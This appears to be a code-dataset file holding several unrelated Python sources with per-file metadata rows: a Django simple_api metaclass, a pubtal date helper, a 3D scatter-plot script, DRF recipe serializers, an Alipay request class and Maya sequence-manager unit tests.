from simple_api.object.object import Object, ObjectMeta
from simple_api.object.registry import object_storage
from simple_api.django_object.registry import model_django_object_storage
from simple_api.utils import ClassStub
class DjangoObjectMeta(type):
    """Metaclass that turns a ``DjangoObject`` subclass declaration into a
    simple_api ``Object`` (stored on ``cls._object``): it determines the
    exposed fields, builds the filter and list types, and wires up the
    default CRUD actions plus any custom actions.
    """
    base_class = "simple_api.django_object.django_object.DjangoObject"
    def __new__(mcs, name, bases, attrs, **kwargs):
        cls = super().__new__(mcs, name, bases, attrs)
        # the abstract base class itself (or classes created with skip=True)
        # is not converted into an Object
        if kwargs.get("skip", False) or object_storage.key_for_class(attrs["__module__"], name) == mcs.base_class:
            return cls
        object_stub = ClassStub(name=cls.__name__, bases=(Object,))
        # set the module of the generated Object class to match the module of the user class
        object_stub.add_attr("__module__", cls.__module__)
        assert cls.model is not None, "`model` must be set."
        # if the class is meant to resolve relations, store it for the particular model
        if cls.class_for_related:
            model_django_object_storage.store(cls.model, cls)
        cls.pk_field_name, cls.pk_field = get_pk_field(cls.model)
        object_stub.add_attr("pk_field", cls.pk_field_name)
        # make sure the primary key is included, otherwise `ModelObjectAction`s would just not work
        if cls.only_fields and cls.pk_field_name not in cls.only_fields:
            cls.only_fields = cls.only_fields + (cls.pk_field_name,)
        elif cls.exclude_fields and cls.pk_field_name in cls.exclude_fields:
            # materialize as a tuple: the original generator expression was a
            # single-use iterator, exhausted after the first consumer and
            # leaving `exclude_fields` empty for any later use
            cls.exclude_fields = tuple(f for f in cls.exclude_fields if f != cls.pk_field_name)
        fields, input_fields, output_fields, field_validators = determine_simple_api_fields(
            cls.model,
            cls.only_fields, cls.exclude_fields,
            cls.custom_fields, cls.input_custom_fields, cls.output_custom_fields,
        )
        # input-only and output-only fields must not clash with the common fields
        for f in input_fields:
            assert f not in fields, "Redefinition of `{}` field.".format(f)
        cls.in_fields = {**fields, **input_fields}
        for f in output_fields:
            assert f not in fields, "Redefinition of `{}` field.".format(f)
        cls.out_fields = {**fields, **output_fields}
        object_stub.add_attr("fields", fields)
        object_stub.add_attr("input_fields", input_fields)
        object_stub.add_attr("output_fields", output_fields)
        # create filters and List type for potential listing actions
        cls.filter_type = ObjectMeta("{}Filters".format(cls.__name__), (Object,), {"fields": generate_filters(cls)})
        object_stub.add_attr("filter_type", cls.filter_type)
        create_associated_list_type(cls)
        # collect the enabled default CRUD actions; deepcopy so the shared
        # class-level default action instances are never mutated below
        actions = {}
        if cls.detail_action is not None:
            actions["detail"] = deepcopy(cls.detail_action)
        if cls.list_action is not None:
            actions["list"] = deepcopy(cls.list_action)
        if cls.create_action is not None:
            actions["create"] = deepcopy(cls.create_action)
        if cls.update_action is not None:
            actions["update"] = deepcopy(cls.update_action)
        if cls.delete_action is not None:
            actions["delete"] = deepcopy(cls.delete_action)
        actions.update(cls.custom_actions)
        # bind each action to this class and convert it to a plain Action
        converted_actions = {}
        for action_name, action in actions.items():
            action.set_parent_class(cls)
            action.set_name(action_name)
            converted_actions[action_name] = action.to_action()
        object_stub.add_attr("actions", converted_actions)
        if cls.field_difficulty_scores is not None:
            object_stub.add_attr("field_difficulty_scores", cls.field_difficulty_scores)
        cls._object = object_stub.build(ObjectMeta)
        return cls
class DjangoObject(metaclass=DjangoObjectMeta):
    """Declarative base class: subclass it and set ``model``; the metaclass
    then generates the matching simple_api ``Object`` automatically.
    """
    # the Django model this object wraps; must be set by subclasses
    model = None
    # NOTE(review): auto_pk is not referenced in this module; semantics unconfirmed
    auto_pk = True
    # register this class so relations pointing at ``model`` resolve to it
    class_for_related = True
    # restrict the exposed model fields: whitelist (only_fields) or blacklist
    # (exclude_fields); the primary key is always kept by the metaclass
    only_fields = None
    exclude_fields = None
    # extra non-model fields: common, input-only and output-only
    custom_fields = {}
    input_custom_fields = {}
    output_custom_fields = {}
    field_difficulty_scores = {}
    # default CRUD actions; set any of them to None to disable that action
    detail_action = DetailAction()
    list_action = ListAction()
    create_action = CreateAction()
    update_action = UpdateAction()
    delete_action = DeleteAction()
    # additional actions merged over the defaults (same-name entries win)
    custom_actions = {}
    @classmethod
    def to_object(cls):
        """Return the simple_api ``Object`` generated for this class."""
        return cls._object
| simple_api/django_object/django_object.py | 4,643 | set the module of the generated Object class to match the module of the user class if the class is meant to resolve relations, store it for the particular model make sure the primary key is included, otherwise `ModelObjectAction`s would just not work create filters and List type for potential listing actions | 309 | en | 0.86762 |
""" A class that can provide a date/time in any timeformat.format() format and both
local and UTC timezones within a ContextVariable.
Copyright (c) 2004 Colin Stewart (http://www.owlfish.com/)
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author may not be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
If you make any bug fixes or feature enhancements please let me know!
"""
import re, time, math, string
import timeformat
from simpletal import simpleTALES
PATHREGEX = re.compile ('^((?:local)|(?:utc))/?(.*)$')
class Date (simpleTALES.ContextVariable):
    """Context variable exposing a date/time under the paths 'local' and
    'utc', each optionally followed by a timeformat format string, e.g.:
        utc/%d-%m-%Y
    """
    def __init__ (self, value = None, defaultFormat = '%a[SHORT], %d %b[SHORT] %Y %H:%M:%S %Z'):
        """'value' is a time tuple in the LOCAL timezone (None means "now")."""
        self.ourValue = value
        self.defaultFormat = defaultFormat

    def value (self, currentPath=None):
        # Unless the path says otherwise: local timezone, default format.
        useUTC = 0
        fmt = self.defaultFormat
        if (currentPath is not None):
            index, pathParts = currentPath
            remainder = '/'.join (pathParts[index:])
            match = PATHREGEX.match (remainder)
            if (match is not None):
                # First path element picks the timezone...
                if (match.group(1) == 'local'):
                    useUTC = 0
                else:
                    useUTC = 1
                # ...the (optional) rest is a timeformat format string.
                fmt = match.group(2)
                if (fmt == ""):
                    fmt = self.defaultFormat
        if (self.ourValue is None):
            # No explicit value was given: use the current local time.
            timeValue = time.localtime()
        else:
            timeValue = self.ourValue
        if (useUTC):
            # Convert the local time tuple to UTC (GMT).
            timeValue = time.gmtime (time.mktime (timeValue))
        result = timeformat.format (fmt, timeValue, utctime=useUTC)
        # Hand the formatted string back by raising it as a ContextVariable.
        raise simpleTALES.ContextVariable (result)
| lib/pubtal/DateContext.py | 3,035 | Wraps a DateTime and provides context paths local and utc.
These paths in turn can take TimeFormat formats, for example:
utc/%d-%m-%Y
The value should be in the LOCAL timezone.
A class that can provide a date/time in any timeformat.format() format and both
local and UTC timezones within a ContextVariable.
Copyright (c) 2004 Colin Stewart (http://www.owlfish.com/)
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author may not be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
If you make any bug fixes or feature enhancements please let me know!
Default to local timezone and RFC822 format Default to the current time! Convert to UTC (GMT) | 1,934 | en | 0.856991 |
import pandas as pd
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import axes3d

# Load the orchard data set.
dataset = pd.read_csv('orchard.csv')

# Draw a single 3-D scatter plot of the decrease/rowpos/colpos columns.
figure = plt.figure()
axis3d = figure.add_subplot(1, 1, 1, projection = '3d')
axis3d.scatter(dataset.decrease, dataset.rowpos, dataset.colpos)
axis3d.set_xlabel('decrease')
axis3d.set_ylabel('rowpos')
axis3d.set_zlabel('colpos')
# colors reference (see link below):
# https://pythonspot.com/3d-scatterplot/ | Python/grafico_3d.py | 387 | cores https://pythonspot.com/3d-scatterplot/ | 44 | en | 0.633602 |
from rest_framework import serializers
from core.models import Tag, Ingredient, Recipe
class TagSerializer(serializers.ModelSerializer):
    """Serializer for Tag objects (exposes id and name; id is read-only)."""
    class Meta:
        model = Tag
        fields = ('id', 'name')
        read_only_fields = ('id',)
class IngredientSerializer(serializers.ModelSerializer):
    """Serializer for Ingredient objects (exposes id and name; id is read-only)."""
    class Meta:
        model = Ingredient
        fields = ('id', 'name')
        read_only_fields = ('id',)
class RecipeSerializer(serializers.ModelSerializer):
    """Serializer for Recipe objects; related ingredients and tags are
    represented by their primary keys."""
    # related ingredients as primary keys (full objects: see RecipeDetailSerializer)
    ingredients = serializers.PrimaryKeyRelatedField(
        many=True,
        queryset=Ingredient.objects.all()
    )
    # related tags as primary keys
    tags = serializers.PrimaryKeyRelatedField(
        many=True,
        queryset=Tag.objects.all()
    )
    class Meta:
        model = Recipe
        fields = ('id', 'title', 'ingredients', 'tags',
                  'time_minutes', 'price', 'link')
        read_only_fields = ('id',)
class RecipeDetailSerializer(RecipeSerializer):
    """Serializer for a recipe detail view: nests full read-only
    ingredient/tag objects instead of primary keys."""
    ingredients = IngredientSerializer(many=True, read_only=True)
    tags = TagSerializer(many=True, read_only=True)
class RecipeImageSerializer(serializers.ModelSerializer):
    """Serializer for uploading images to recipes."""
    class Meta:
        model = Recipe
        fields = ('id', 'image')
        read_only_fields = ('id',)
| app/recipe/serializers.py | 1,468 | Seraializer for Ingredient object
Serializer a recipe detail
Serializer for uploading images to recipes
Recipe serailizer
Seraizlizer for TAG object | 148 | en | 0.681499 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.AlipayEbppInvoiceApplyStatusNotifyModel import AlipayEbppInvoiceApplyStatusNotifyModel
class AlipayEbppInvoiceApplyStatusNotifyRequest(object):
    """Request wrapper for the ``alipay.ebpp.invoice.apply.status.notify``
    OpenAPI method: holds the business payload plus common request
    parameters and serializes them via :meth:`get_params`.
    """
    def __init__(self, biz_model=None):
        self._biz_model = biz_model
        self._biz_content = None
        self._version = "1.0"
        self._terminal_type = None
        self._terminal_info = None
        self._prod_code = None
        self._notify_url = None
        self._return_url = None
        self._udf_params = None
        self._need_encrypt = False
    @property
    def biz_model(self):
        return self._biz_model
    @biz_model.setter
    def biz_model(self, value):
        self._biz_model = value
    @property
    def biz_content(self):
        return self._biz_content
    @biz_content.setter
    def biz_content(self, value):
        # accept either a ready-made model instance or a plain dict,
        # which is converted into the model here
        if isinstance(value, AlipayEbppInvoiceApplyStatusNotifyModel):
            self._biz_content = value
        else:
            self._biz_content = AlipayEbppInvoiceApplyStatusNotifyModel.from_alipay_dict(value)
    @property
    def version(self):
        return self._version
    @version.setter
    def version(self, value):
        self._version = value
    @property
    def terminal_type(self):
        return self._terminal_type
    @terminal_type.setter
    def terminal_type(self, value):
        self._terminal_type = value
    @property
    def terminal_info(self):
        return self._terminal_info
    @terminal_info.setter
    def terminal_info(self, value):
        self._terminal_info = value
    @property
    def prod_code(self):
        return self._prod_code
    @prod_code.setter
    def prod_code(self, value):
        self._prod_code = value
    @property
    def notify_url(self):
        return self._notify_url
    @notify_url.setter
    def notify_url(self, value):
        self._notify_url = value
    @property
    def return_url(self):
        return self._return_url
    @return_url.setter
    def return_url(self, value):
        self._return_url = value
    @property
    def udf_params(self):
        return self._udf_params
    @udf_params.setter
    def udf_params(self, value):
        # non-dict values are silently ignored (keeps previous value)
        if not isinstance(value, dict):
            return
        self._udf_params = value
    @property
    def need_encrypt(self):
        return self._need_encrypt
    @need_encrypt.setter
    def need_encrypt(self, value):
        self._need_encrypt = value
    def add_other_text_param(self, key, value):
        """Add one extra user-defined text parameter to the request."""
        if not self.udf_params:
            self.udf_params = dict()
        self.udf_params[key] = value
    def get_params(self):
        """Assemble the flat parameter dict sent to the gateway.

        ``biz_model``/``biz_content`` are JSON-encoded with sorted keys and
        compact separators; only the parameters that are set are included.
        """
        params = dict()
        params[P_METHOD] = 'alipay.ebpp.invoice.apply.status.notify'
        params[P_VERSION] = self.version
        if self.biz_model:
            params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
        if self.biz_content:
            if hasattr(self.biz_content, 'to_alipay_dict'):
                params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
            else:
                params['biz_content'] = self.biz_content
        if self.terminal_type:
            params['terminal_type'] = self.terminal_type
        if self.terminal_info:
            params['terminal_info'] = self.terminal_info
        if self.prod_code:
            params['prod_code'] = self.prod_code
        if self.notify_url:
            params['notify_url'] = self.notify_url
        if self.return_url:
            params['return_url'] = self.return_url
        if self.udf_params:
            params.update(self.udf_params)
        return params
    def get_multipart_params(self):
        """Return file-upload parameters; this request has none."""
        multipart_params = dict()
        return multipart_params
| alipay/aop/api/request/AlipayEbppInvoiceApplyStatusNotifyRequest.py | 4,004 | !/usr/bin/env python -*- coding: utf-8 -*- | 42 | en | 0.34282 |
# -*- coding: utf-8 -*-
import unittest
import os
# prepare for test
os.environ['ANIMA_TEST_SETUP'] = ""
from anima.env import mayaEnv # to setup maya extensions
import pymel.core
from anima.edit import Sequence, Media, Video, Track, Clip, File
class SequenceManagerTestCase(unittest.TestCase):
"""tests the SequenceManagerExtension class
"""
    def setUp(self):
        """Create a fresh Maya scene and grab its default sequenceManager node."""
        # create a new scene and get the sequenceManager in the scene
        pymel.core.newFile(force=True)
        self.sm = pymel.core.PyNode('sequenceManager1')
    def test_from_xml_path_argument_skipped(self):
        """testing if a TypeError will be raised when the path argument is
        skipped
        """
        sm = pymel.core.PyNode('sequenceManager1')
        with self.assertRaises(TypeError) as cm:
            sm.from_xml()
        # NOTE(review): relies on Python 2's exception.message attribute and
        # Python 2 argument-count wording
        self.assertEqual(
            cm.exception.message,
            'from_xml() takes exactly 2 arguments (1 given)'
        )
    def test_from_xml_path_argument_is_not_a_string(self):
        """testing if a TypeError will be raised when the path argument is not
        a string
        """
        sm = pymel.core.PyNode('sequenceManager1')
        with self.assertRaises(TypeError) as cm:
            sm.from_xml(30)
        # NOTE(review): relies on Python 2's exception.message attribute
        self.assertEqual(
            cm.exception.message,
            'path argument in SequenceManager.from_xml should be a string, '
            'not int'
        )
    def test_from_xml_path_argument_is_not_a_valid_path(self):
        """testing if a IOError will be raised when the path argument is not
        a valid path
        """
        sm = pymel.core.PyNode('sequenceManager1')
        with self.assertRaises(IOError) as cm:
            sm.from_xml('not a valid path')
        # NOTE(review): relies on Python 2's exception.message attribute
        self.assertEqual(
            cm.exception.message,
            'Please supply a valid path to an XML file!'
        )
    def test_from_xml_generates_correct_sequencer_hierarchy(self):
        """testing if from_xml method will generate Sequences and shots
        correctly
        """
        path = os.path.abspath('./test_data/test_v001.xml')
        sm = pymel.core.PyNode('sequenceManager1')
        sm.from_xml(path)
        # exactly one sequencer should have been created from the XML
        sequences = sm.sequences.get()
        self.assertEqual(len(sequences), 1)
        sequencer = sequences[0]
        self.assertIsInstance(sequencer, pymel.core.nt.Sequencer)
        self.assertEqual(sequencer.duration, 111)
        self.assertEqual(sequencer.sequence_name.get(), 'SEQ001_HSNI_003')
        # check scene fps
        self.assertEqual(pymel.core.currentUnit(q=1, t=1), 'film')
        # check timecode
        time = pymel.core.PyNode('time1')
        self.assertEqual(time.timecodeProductionStart.get(), 0.0)
        shots = sequencer.shots.get()
        self.assertEqual(len(shots), 3)
        shot1 = shots[0]
        shot2 = shots[1]
        shot3 = shots[2]
        # Clip1: name, resolution, track and frame ranges from the XML
        self.assertEqual('0010', shot1.shotName.get())
        self.assertEqual(1024, shot1.wResolution.get())
        self.assertEqual(778, shot1.hResolution.get())
        self.assertEqual(1, shot1.track.get())
        self.assertEqual(1.0, shot1.sequenceStartFrame.get())
        self.assertEqual(34.0, shot1.sequenceEndFrame.get())
        self.assertEqual(34.0, shot1.duration)
        self.assertEqual(10.0, shot1.startFrame.get())
        self.assertEqual(43.0, shot1.endFrame.get())
        self.assertEqual(
            '/tmp/SEQ001_HSNI_003_0010_v001.mov',
            shot1.output.get()
        )
        # Clip2
        self.assertEqual('0020', shot2.shotName.get())
        self.assertEqual(1024, shot2.wResolution.get())
        self.assertEqual(778, shot2.hResolution.get())
        self.assertEqual(1, shot2.track.get())
        self.assertEqual(35.0, shot2.sequenceStartFrame.get())
        self.assertEqual(65.0, shot2.sequenceEndFrame.get())
        self.assertEqual(31.0, shot2.duration)
        self.assertEqual(10.0, shot2.startFrame.get())
        self.assertEqual(40.0, shot2.endFrame.get())
        self.assertEqual(
            '/tmp/SEQ001_HSNI_003_0020_v001.mov',
            shot2.output.get()
        )
        # Clip3
        self.assertEqual('0030', shot3.shotName.get())
        self.assertEqual(1024, shot3.wResolution.get())
        self.assertEqual(778, shot3.hResolution.get())
        self.assertEqual(1, shot3.track.get())
        self.assertEqual(66.0, shot3.sequenceStartFrame.get())
        self.assertEqual(111.0, shot3.sequenceEndFrame.get())
        self.assertEqual(46.0, shot3.duration)
        self.assertEqual(10.0, shot3.startFrame.get())
        self.assertEqual(55.0, shot3.endFrame.get())
        self.assertEqual(
            '/tmp/SEQ001_HSNI_003_0030_v001.mov',
            shot3.output.get()
        )
    def test_from_xml_updates_sequencer_hierarchy_with_shots_expanded_and_contracted(self):
        """testing if from_xml method will update Sequences and shots
        correctly with the xml file
        """
        path = os.path.abspath('./test_data/test_v002.xml')
        sm = pymel.core.PyNode('sequenceManager1')
        sm.set_version('v001')
        # build an initial three-shot sequence by hand
        seq = sm.create_sequence('SEQ001_HSNI_003')
        shot1 = seq.create_shot('0010')
        shot1.startFrame.set(0)
        shot1.endFrame.set(33)
        shot1.sequenceStartFrame.set(1)
        shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
        shot1.handle.set(10)
        shot1.track.set(1)
        shot2 = seq.create_shot('0020')
        shot2.startFrame.set(34)
        shot2.endFrame.set(64)
        shot2.sequenceStartFrame.set(35)
        shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
        shot2.handle.set(10)
        shot2.track.set(1)
        shot3 = seq.create_shot('0030')
        shot3.startFrame.set(65)
        shot3.endFrame.set(110)
        shot3.sequenceStartFrame.set(66)
        shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
        shot3.handle.set(10)
        shot3.track.set(1)
        self.assertEqual(shot1.track.get(), 1)
        self.assertEqual(shot2.track.get(), 1)
        self.assertEqual(shot3.track.get(), 1)
        # now update it with test_v002.xml
        sm.from_xml(path)
        # check shot data
        self.assertEqual('0010', shot1.shotName.get())
        self.assertEqual(1, shot1.track.get())
        self.assertEqual(1.0, shot1.sequenceStartFrame.get())
        self.assertEqual(54.0, shot1.sequenceEndFrame.get())
        self.assertEqual(-10.0, shot1.startFrame.get())
        self.assertEqual(43.0, shot1.endFrame.get())
        # Clip2
        self.assertEqual('0020', shot2.shotName.get())
        self.assertEqual(1, shot2.track.get())
        self.assertEqual(55.0, shot2.sequenceStartFrame.get())
        self.assertEqual(75.0, shot2.sequenceEndFrame.get())
        self.assertEqual(44.0, shot2.startFrame.get())
        self.assertEqual(64.0, shot2.endFrame.get())
        # Clip3
        self.assertEqual('0030', shot3.shotName.get())
        self.assertEqual(1, shot3.track.get())
        self.assertEqual(76.0, shot3.sequenceStartFrame.get())
        self.assertEqual(131.0, shot3.sequenceEndFrame.get())
        self.assertEqual(65.0, shot3.startFrame.get())
        self.assertEqual(120.0, shot3.endFrame.get())
    def test_from_edl_updates_sequencer_hierarchy_with_shots_expanded_and_contracted(self):
        """testing if from_edl method will update Sequences and shots
        correctly with the edl file
        """
        path = os.path.abspath('./test_data/test_v002.edl')
        sm = pymel.core.PyNode('sequenceManager1')
        sm.set_version('v001')
        # build an initial three-shot sequence by hand
        seq = sm.create_sequence('SEQ001_HSNI_003')
        shot1 = seq.create_shot('0010')
        shot1.startFrame.set(0)
        shot1.endFrame.set(33)
        shot1.sequenceStartFrame.set(1)
        shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
        shot1.handle.set(10)
        shot1.track.set(1)
        shot2 = seq.create_shot('0020')
        shot2.startFrame.set(34)
        shot2.endFrame.set(64)
        shot2.sequenceStartFrame.set(35)
        shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
        shot2.handle.set(10)
        shot2.track.set(1)
        shot3 = seq.create_shot('0030')
        shot3.startFrame.set(65)
        shot3.endFrame.set(110)
        shot3.sequenceStartFrame.set(66)
        shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
        shot3.handle.set(10)
        shot3.track.set(1)
        self.assertEqual(shot1.track.get(), 1)
        self.assertEqual(shot2.track.get(), 1)
        self.assertEqual(shot3.track.get(), 1)
        # now update it with test_v002.xml
        sm.from_edl(path)
        # check shot data
        self.assertEqual('0010', shot1.shotName.get())
        self.assertEqual(1, shot1.track.get())
        self.assertEqual(1.0, shot1.sequenceStartFrame.get())
        self.assertEqual(54.0, shot1.sequenceEndFrame.get())
        self.assertEqual(-10.0, shot1.startFrame.get())
        self.assertEqual(43.0, shot1.endFrame.get())
        # Clip2
        self.assertEqual('0020', shot2.shotName.get())
        self.assertEqual(1, shot2.track.get())
        self.assertEqual(55.0, shot2.sequenceStartFrame.get())
        self.assertEqual(76.0, shot2.sequenceEndFrame.get())
        self.assertEqual(44.0, shot2.startFrame.get())
        self.assertEqual(65.0, shot2.endFrame.get())
        # Clip3
        self.assertEqual('0030', shot3.shotName.get())
        self.assertEqual(1, shot3.track.get())
        self.assertEqual(77.0, shot3.sequenceStartFrame.get())
        self.assertEqual(133.0, shot3.sequenceEndFrame.get())
        self.assertEqual(65.0, shot3.startFrame.get())
        self.assertEqual(121.0, shot3.endFrame.get())
    def test_from_edl_updates_sequencer_hierarchy_with_shots_used_more_than_one_times(self):
        """testing if from_edl method will update Sequences and shots correctly
        with shot are used more than once
        """
        path = os.path.abspath('./test_data/test_v004.edl')
        sm = pymel.core.PyNode('sequenceManager1')
        sm.set_version('v001')
        # build an initial three-shot sequence by hand
        seq = sm.create_sequence('SEQ001_HSNI_003')
        shot1 = seq.create_shot('0010')
        shot1.startFrame.set(0)
        shot1.endFrame.set(33)
        shot1.sequenceStartFrame.set(1)
        shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
        shot1.handle.set(10)
        shot1.track.set(1)
        shot2 = seq.create_shot('0020')
        shot2.startFrame.set(34)
        shot2.endFrame.set(64)
        shot2.sequenceStartFrame.set(35)
        shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
        shot2.handle.set(10)
        shot2.track.set(1)
        shot3 = seq.create_shot('0030')
        shot3.startFrame.set(65)
        shot3.endFrame.set(110)
        shot3.sequenceStartFrame.set(66)
        shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
        shot3.handle.set(10)
        shot3.track.set(1)
        # set a camera for shot4
        shot3.set_camera('persp')
        self.assertEqual(shot1.track.get(), 1)
        self.assertEqual(shot2.track.get(), 1)
        self.assertEqual(shot3.track.get(), 1)
        # now update it with test_v002.xml
        sm.from_edl(path)
        # check if there are 4 shots
        self.assertEqual(4, len(seq.shots.get()))
        # check shot data
        self.assertEqual('0010', shot1.shotName.get())
        self.assertEqual(1, shot1.track.get())
        self.assertEqual(1.0, shot1.sequenceStartFrame.get())
        self.assertEqual(54.0, shot1.sequenceEndFrame.get())
        self.assertEqual(-10.0, shot1.startFrame.get())
        self.assertEqual(43.0, shot1.endFrame.get())
        # Clip2
        self.assertEqual('0020', shot2.shotName.get())
        self.assertEqual(1, shot2.track.get())
        self.assertEqual(55.0, shot2.sequenceStartFrame.get())
        self.assertEqual(76.0, shot2.sequenceEndFrame.get())
        self.assertEqual(44.0, shot2.startFrame.get())
        self.assertEqual(65.0, shot2.endFrame.get())
        # Clip3
        self.assertEqual('0030', shot3.shotName.get())
        self.assertEqual(1, shot3.track.get())
        self.assertEqual(77.0, shot3.sequenceStartFrame.get())
        self.assertEqual(133.0, shot3.sequenceEndFrame.get())
        self.assertEqual(65.0, shot3.startFrame.get())
        self.assertEqual(121.0, shot3.endFrame.get())
        # Clip4
        # there should be an extra shot
        shot4 = seq.shots.get()[-1]
        self.assertEqual('0030', shot4.shotName.get())
        self.assertEqual(1, shot4.track.get())
        self.assertEqual(133.0, shot4.sequenceStartFrame.get())
        self.assertEqual(189.0, shot4.sequenceEndFrame.get())
        self.assertEqual(65.0, shot4.startFrame.get())
        self.assertEqual(121.0, shot4.endFrame.get())
        # check if their cameras also the same
        self.assertEqual(
            shot3.get_camera(),
            shot4.get_camera()
        )
def test_from_xml_updates_sequencer_hierarchy_with_shots_removed(self):
    """testing if from_xml method will update Sequences and shots
    correctly with the xml file, including removing shots that are no
    longer present in the xml
    """
    path = os.path.abspath('./test_data/test_v003.xml')
    sm = pymel.core.PyNode('sequenceManager1')
    sm.set_version('v001')
    seq = sm.create_sequence('SEQ001_HSNI_003')
    # build an initial three-shot sequence that the XML will then update
    shot1 = seq.create_shot('0010')
    shot1.startFrame.set(0)
    shot1.endFrame.set(33)
    shot1.sequenceStartFrame.set(1)
    shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
    shot1.handle.set(10)
    shot1.track.set(1)
    shot2 = seq.create_shot('0020')
    shot2.startFrame.set(34)
    shot2.endFrame.set(64)
    shot2.sequenceStartFrame.set(35)
    shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
    shot2.handle.set(10)
    shot2.track.set(1)
    shot3 = seq.create_shot('0030')
    shot3.startFrame.set(65)
    shot3.endFrame.set(110)
    shot3.sequenceStartFrame.set(66)
    shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
    shot3.handle.set(10)
    shot3.track.set(1)
    self.assertEqual(shot1.track.get(), 1)
    self.assertEqual(shot2.track.get(), 1)
    self.assertEqual(shot3.track.get(), 1)
    # now update it with test_v003.xml
    sm.from_xml(path)
    # we should have 2 shots only
    self.assertEqual(2, len(seq.shots.get()))
    # check shot data
    self.assertEqual('0010', shot1.shotName.get())
    self.assertEqual(1, shot1.track.get())
    self.assertEqual(1.0, shot1.sequenceStartFrame.get())
    self.assertEqual(54.0, shot1.sequenceEndFrame.get())
    self.assertEqual(-10.0, shot1.startFrame.get())
    self.assertEqual(43.0, shot1.endFrame.get())
    # Clip2
    # removed
    # Clip3
    self.assertEqual('0030', shot3.shotName.get())
    self.assertEqual(1, shot3.track.get())
    self.assertEqual(55.0, shot3.sequenceStartFrame.get())
    self.assertEqual(110.0, shot3.sequenceEndFrame.get())
    self.assertEqual(65.0, shot3.startFrame.get())
    self.assertEqual(120.0, shot3.endFrame.get())
def test_to_xml_will_generate_proper_xml_string(self):
    """testing if a proper xml compatible string will be generated with
    to_xml() method
    """
    path = os.path.abspath('./test_data/test_v001.xml')
    manager = pymel.core.PyNode('sequenceManager1')
    manager.set_shot_name_template('<Sequence>_<Shot>_<Version>')
    manager.set_version('v001')
    sequence = manager.create_sequence('SEQ001_HSNI_003')

    # one row per shot: (code, startFrame, endFrame, sequenceStartFrame, output)
    shot_table = (
        ('0010', 0, 33, 1, '/tmp/SEQ001_HSNI_003_0010_v001.mov'),
        ('0020', 34, 64, 35, '/tmp/SEQ001_HSNI_003_0020_v001.mov'),
        ('0030', 65, 110, 66, '/tmp/SEQ001_HSNI_003_0030_v001.mov'),
    )
    created_shots = []
    for code, start, end, seq_start, output_path in shot_table:
        shot = sequence.create_shot(code)
        shot.startFrame.set(start)
        shot.endFrame.set(end)
        shot.sequenceStartFrame.set(seq_start)
        shot.output.set(output_path)
        shot.handle.set(10)
        shot.track.set(1)
        created_shots.append(shot)

    # every shot must sit on track 1
    for shot in created_shots:
        self.assertEqual(1, shot.track.get())

    result = manager.to_xml()
    with open(path) as f:
        expected = f.read()
    self.maxDiff = None
    self.assertEqual(expected, result)
